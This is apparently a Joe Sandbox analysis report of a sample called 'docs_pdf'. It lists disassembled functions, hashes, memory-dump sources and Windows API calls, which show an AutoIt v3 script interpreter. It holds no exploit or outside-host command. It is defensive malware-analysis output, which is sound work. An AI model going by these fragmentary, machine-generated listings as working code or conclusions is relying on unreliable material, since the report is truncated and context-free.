                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 573e2e92373afad5661f9b8c55e737a6f1d8348703e215d324adfc8bd93fe277
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: FCC194322091A30ADF2D463994345BEFBE15EA27B131A077DE4B2DB5C4EF20D5B9D620
                                                            Function 00111BB8 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: d27c9289e1fff381ed9e23103e3b2b779baece8f6bdbde696a7cfc1556fc04fb
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 2CC1C43220919319DF2D463AD4346BEFBE15AA27B131A077DE5B3CB4C4EF20D5A9D620
                                                            Function 036E35E0 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: 38ce6ea74fe24fe9e113d20579a45c880c80a7c6c8fc70e33e9979776e0934ad
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 9441A271D1051CEBCF48CFADC991AAEBBF2AF88201F648299D516AB345D730AB41DB50
                                                            Function 036E3470 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 1ce2eaf0beff86c476ff67e9402b752b64b4ac0be013dca9c65c43ba58b24958
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 8D01C079A01209EFCB44DF98C6809AEF7B5FB48310B2085D9D809AB300D730AE41DB90
                                                            Function 036E34D0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: 02511fd3eca7c6af2c5538f71f6540c254a9877e63e78684655d779628c10b8b
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 2C019278A05209EFCB44DF98C6909AEF7F5FB48310F2485D9D819A7701D730AE41DB80
                                                            Function 036E1E70 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106556596.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_36e0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 00167B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 00167B70
                                                            • DeleteObject.GDI32(00000000), ref: 00167B82
                                                            • DestroyWindow.USER32 ref: 00167B90
                                                            • GetDesktopWindow.USER32 ref: 00167BAA
                                                            • GetWindowRect.USER32(00000000), ref: 00167BB1
                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00167CF2
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00167D02
                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167D4A
                                                            • GetClientRect.USER32(00000000,?), ref: 00167D56
                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00167D90
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DB2
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DC5
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD0
                                                            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DD9
                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DE8
                                                            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF1
                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167DF8
                                                            • GlobalFree.KERNEL32(00000000), ref: 00167E03
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167E15
                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00182CAC,00000000), ref: 00167E2B
                                                            • GlobalFree.KERNEL32(00000000), ref: 00167E3B
                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00167E61
                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00167E80
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00167EA2
                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0016808F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                            • API String ID: 2211948467-2373415609
                                                            • Opcode ID: cd4237df3e7ed89db18fe6c5ab346f47c4d79d9e8f90afd36a730473b200f8ab
                                                            • Instruction ID: d67d579680c8e03c2cfc1017a1295a54edb90d92efc419fec79671e8a01365d4
                                                            • Opcode Fuzzy Hash: cd4237df3e7ed89db18fe6c5ab346f47c4d79d9e8f90afd36a730473b200f8ab
                                                            • Instruction Fuzzy Hash: F7026C71900119EFDB14DFA4CC89EAF7BB9FB48314F148558F919AB2A1CB70AD81CB60
                                                            Function 001737F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,0017F910), ref: 001738AF
                                                            • IsWindowVisible.USER32(?), ref: 001738D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 8451f52cb395ccc6a6c7d580b38fe78509b8e4ab4f6a197849de7d413c585eba
                                                            • Instruction ID: ed853de0461e80c7e3ccaa91a025ac0d65fb10aebfdaf06f47c20854535d0816
                                                            • Opcode Fuzzy Hash: 8451f52cb395ccc6a6c7d580b38fe78509b8e4ab4f6a197849de7d413c585eba
                                                            • Instruction Fuzzy Hash: 2FD1C734208305CBCB15EF50C551AAE77B1BF58354F11846DB89A6B3A3CB71EE8ADB42
                                                            Function 0017A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 0017A89F
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0017A8D0
                                                            • GetSysColor.USER32(0000000F), ref: 0017A8DC
                                                            • SetBkColor.GDI32(?,000000FF), ref: 0017A8F6
                                                            • SelectObject.GDI32(?,?), ref: 0017A905
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0017A930
                                                            • GetSysColor.USER32(00000010), ref: 0017A938
                                                            • CreateSolidBrush.GDI32(00000000), ref: 0017A93F
                                                            • FrameRect.USER32(?,?,00000000), ref: 0017A94E
                                                            • DeleteObject.GDI32(00000000), ref: 0017A955
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0017A9A0
                                                            • FillRect.USER32(?,?,?), ref: 0017A9D2
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017A9FD
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(00000012), ref: 0017AB99
                                                              • Part of subcall function 0017AB60: SetTextColor.GDI32(?,?), ref: 0017AB9D
                                                              • Part of subcall function 0017AB60: GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(0000000F), ref: 0017ABBE
                                                              • Part of subcall function 0017AB60: GetSysColor.USER32(00000011), ref: 0017ABDB
                                                              • Part of subcall function 0017AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
                                                              • Part of subcall function 0017AB60: SelectObject.GDI32(?,00000000), ref: 0017ABFA
                                                              • Part of subcall function 0017AB60: SetBkColor.GDI32(?,00000000), ref: 0017AC03
                                                              • Part of subcall function 0017AB60: SelectObject.GDI32(?,?), ref: 0017AC10
                                                              • Part of subcall function 0017AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
                                                              • Part of subcall function 0017AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
                                                              • Part of subcall function 0017AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                            • String ID:
                                                            • API String ID: 4124339563-0
                                                            • Opcode ID: 1e897e6f0b267e9384248f118189093f98e003d82f145a438e759541b2a46982
                                                            • Instruction ID: 0935a8a62e7a15fddc640caabf4b43710f595e2b3d92c17c96c06ad7d2e4016a
                                                            • Opcode Fuzzy Hash: 1e897e6f0b267e9384248f118189093f98e003d82f145a438e759541b2a46982
                                                            • Instruction Fuzzy Hash: F1A19F72008301AFD7109F64DC08A6F7BB9FF88321F504A2DFA6A961E0D730D985CB52
                                                            Function 001677BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 001677F1
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001678B0
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001678EE
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00167900
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00167946
                                                            • GetClientRect.USER32(00000000,?), ref: 00167952
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00167996
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001679A5
                                                            • GetStockObject.GDI32(00000011), ref: 001679B5
                                                            • SelectObject.GDI32(00000000,00000000), ref: 001679B9
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001679C9
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001679D2
                                                            • DeleteDC.GDI32(00000000), ref: 001679DB
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00167A07
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00167A1E
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00167A59
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00167A6D
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00167A7E
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00167AAE
                                                            • GetStockObject.GDI32(00000011), ref: 00167AB9
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00167AC4
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00167ACE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: 8eaad3c56175d39908403d8dee51d3c712a7e965ddfeceff18800ddba293f66d
                                                            • Instruction ID: ba96bb51b7af6bed3150bfb3b6a6ba122168e1d3a5c0c93ad779441eb7f04a2b
                                                            • Opcode Fuzzy Hash: 8eaad3c56175d39908403d8dee51d3c712a7e965ddfeceff18800ddba293f66d
                                                            • Instruction Fuzzy Hash: 50A18F71A40209BFEB14DBA4DC4AFAF7BB9EB44714F004258FA15A76E0D774AD41CB60
                                                            Function 0015AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0015AF89
                                                            • GetDriveTypeW.KERNEL32(?,0017FAC0,?,\\.\,0017F910), ref: 0015B066
                                                            • SetErrorMode.KERNEL32(00000000,0017FAC0,?,\\.\,0017F910), ref: 0015B1C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: 7a1dee3aa3c9a539ac2329c3a198ca1d135453b876c385b5663d15ed27bf041e
                                                            • Instruction ID: bf4f66f9dfc87daed5a37da81346e027f7e99e976a278fae72e9d463f17747ca
                                                            • Opcode Fuzzy Hash: 7a1dee3aa3c9a539ac2329c3a198ca1d135453b876c385b5663d15ed27bf041e
                                                            • Instruction Fuzzy Hash: C951F534688709EBCB48DB50D9E29BE73B0AF153437604016FC2AAF291CB769D49DB43
                                                            Function 000F6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: c1a3d281a99a308a4f1987c02b4f2f4c93b6331091487a95bded879dc14aadc2
                                                            • Instruction ID: 44b5938582f5b4e58bee2d9339075303a688b686ee5bdeec478733320e0f4bde
                                                            • Opcode Fuzzy Hash: c1a3d281a99a308a4f1987c02b4f2f4c93b6331091487a95bded879dc14aadc2
                                                            • Instruction Fuzzy Hash: 34812B70640219BBCB24AF20DD92FFF77A8AF25300F044035FE45AB582EB71DA95D6A1
                                                            Function 0017AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 0017AB99
                                                            • SetTextColor.GDI32(?,?), ref: 0017AB9D
                                                            • GetSysColorBrush.USER32(0000000F), ref: 0017ABB3
                                                            • GetSysColor.USER32(0000000F), ref: 0017ABBE
                                                            • CreateSolidBrush.GDI32(?), ref: 0017ABC3
                                                            • GetSysColor.USER32(00000011), ref: 0017ABDB
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0017ABE9
                                                            • SelectObject.GDI32(?,00000000), ref: 0017ABFA
                                                            • SetBkColor.GDI32(?,00000000), ref: 0017AC03
                                                            • SelectObject.GDI32(?,?), ref: 0017AC10
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0017AC2F
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0017AC46
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0017AC5B
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0017ACA7
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0017ACCE
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0017ACEC
                                                            • DrawFocusRect.USER32(?,?), ref: 0017ACF7
                                                            • GetSysColor.USER32(00000011), ref: 0017AD05
                                                            • SetTextColor.GDI32(?,00000000), ref: 0017AD0D
                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0017AD21
                                                            • SelectObject.GDI32(?,0017A869), ref: 0017AD38
                                                            • DeleteObject.GDI32(?), ref: 0017AD43
                                                            • SelectObject.GDI32(?,?), ref: 0017AD49
                                                            • DeleteObject.GDI32(?), ref: 0017AD4E
                                                            • SetTextColor.GDI32(?,?), ref: 0017AD54
                                                            • SetBkColor.GDI32(?,?), ref: 0017AD5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 1996641542-0
                                                            • Opcode ID: 405fea79c343bf81ce6f6f04a2ba2d67354d849d073a1c80440a03195e30fa04
                                                            • Instruction ID: c012295681c16525f72cd3c01a10cec06762e40b3d5e0b2ca8009a321b793e68
                                                            • Opcode Fuzzy Hash: 405fea79c343bf81ce6f6f04a2ba2d67354d849d073a1c80440a03195e30fa04
                                                            • Instruction Fuzzy Hash: AB614D71900218FFDB119FA4DC48EAE7B79FF48320F118129F919AB2A1D7759D81DB90
                                                            Function 00178C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00178D34
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178D45
                                                            • CharNextW.USER32(0000014E), ref: 00178D74
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00178DB5
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00178DCB
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00178DDC
                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00178DF9
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00178E45
                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00178E5B
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00178E8C
                                                            • _memset.LIBCMT ref: 00178EB1
                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00178EFA
                                                            • _memset.LIBCMT ref: 00178F59
                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00178F83
                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00178FDB
                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00179088
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 001790AA
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001790F4
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00179121
                                                            • DrawMenuBar.USER32(?), ref: 00179130
                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00179158
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                            • String ID: 0
                                                            • API String ID: 1073566785-4108050209
                                                            • Opcode ID: 0a137884f649879d6b99fd9b9e1d54a6c694ab1527c332bf93eccae373ea4867
